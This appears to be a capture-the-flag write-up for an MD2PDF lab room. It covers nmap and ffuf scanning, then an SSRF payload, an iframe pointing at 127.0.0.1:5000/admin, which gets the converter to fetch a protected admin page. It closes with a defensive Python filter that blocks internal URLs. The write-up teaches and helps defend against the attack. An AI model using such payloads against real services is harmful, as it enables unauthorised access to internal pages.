$ aochi-lab_

MD2PDF - writeup


Task1:Challenge

Q.What is the flag?

Let's run nmap.

$ nmap -Pn -sC -sV -A -T4 -oN nmap_result 10.48.147.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 00:32 -0500
WARNING: Service 10.48.147.63:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.48.147.63:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.48.147.63
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 f5:42:7e:05:14:49:7a:69:e2:e2:bc:02:32:bc:bd:3e (RSA)
|   256 cd:a9:f9:bf:04:a6:9a:7a:fb:db:fc:e2:81:d9:92:da (ECDSA)
|_  256 63:64:21:54:d6:6a:8c:13:3d:61:ab:1f:f6:3d:71:0d (ED25519)
80/tcp   open  rtsp
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
|_http-title: MD2PDF
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2660
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./static/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./static/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|     Content-Length: 0
|   RTSPRequest: 
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|_    Content-Length: 0
5000/tcp open  rtsp
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2624
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./assets/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./assets/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|_    Content-Length: 0

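Ports 80 and 5000 were reported as rtsp (Real Time Streaming Protocol), but for some reason HTML is returned and they can be reached over HTTP. I was able to access both ports from a browser.

[Screenshot: web site]

It appears to be a tool that converts Markdown to PDF.

Searching for directories with ffuf turned up /admin.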

ffuf -w /usr/share/wordlists/dirb/common.txt -o ffufrezult.html -of html -e .php,.txt,.zip,.bak -recursion -recursion-depth 1 -v -t 80 -u http://10.48.147.63/FUZZ     

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.48.147.63/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .php .txt .zip .bak 
 :: Output file      : ffufrezult.html
 :: File format      : html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 80
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 2660, Words: 739, Lines: 102, Duration: 143ms]
| URL | http://10.48.147.63/
    * FUZZ: 

[Status: 403, Size: 166, Words: 15, Lines: 5, Duration: 136ms]
| URL | http://10.48.147.63/admin
    * FUZZ: admin

A 403 is returned when you do not have permission to access the resource.

In the web form, enter the HTML below and press Convert to PDF.

<iframe src="http://127.0.0.1:5000/admin"></iframe>

An iframe is a tag that creates a window for embedding another web page.

I obtained the flag.

A.flag{********************}
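
The request that returns the flag is made by the converter itself, so /admin sees a client on 127.0.0.1 instead of the outside browser that got the 403. As an added example (not part of the original write-up or the challenge's code), here is one way a converter could screen submitted Markdown/HTML for such references before rendering; the function names and the attribute list are assumptions, and reading the 403 as a source-address check is inferred from the behaviour above.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a renderer fetch a URL (assumed list, not exhaustive).
URL_ATTRS = {"src", "href", "data", "poster", "action"}

# Constructed sample: the iframe from the write-up next to a harmless image.
SAMPLE = (
    "# Report\n"
    '<iframe src="http://127.0.0.1:5000/admin"></iframe>\n'
    '<img src="https://example.com/logo.png">\n'
)

class _UrlCollector(HTMLParser):
    """Collects (tag, url) for every URL-bearing attribute in the input."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.urls.append((tag, value.strip()))

def is_internal(url):
    """True when the renderer must not fetch this URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True   # file:, data:, relative paths: refused for user input
    host = (parts.hostname or "").rstrip(".")
    if not host or host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Numeric-looking hosts that are not canonical IPs are refused. Real DNS
        # names pass here and must be re-checked against the resolved address.
        return host.rsplit(".", 1)[-1][:1].isdigit()
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def blocked_references(document):
    """Return the (tag, url) pairs the renderer should refuse to load."""
    parser = _UrlCollector()
    parser.feed(document)
    parser.close()
    return [(tag, url) for tag, url in parser.urls if is_internal(url)]

if __name__ == "__main__":
    for tag, url in blocked_references(SAMPLE):
        print(f"refuse <{tag}> -> {url}")
```

A pre-render check like this is one layer only; the renderer's outbound requests should also be restricted at the network level, and internal pages should not rely on the caller's address alone for authorization.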


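Open question

When I change the port specified in the tag to 80 and run it, I get 400 Bad Request. My guess is that port 80 has tighter security, while port 5000 is more lax because it is not normally accessed.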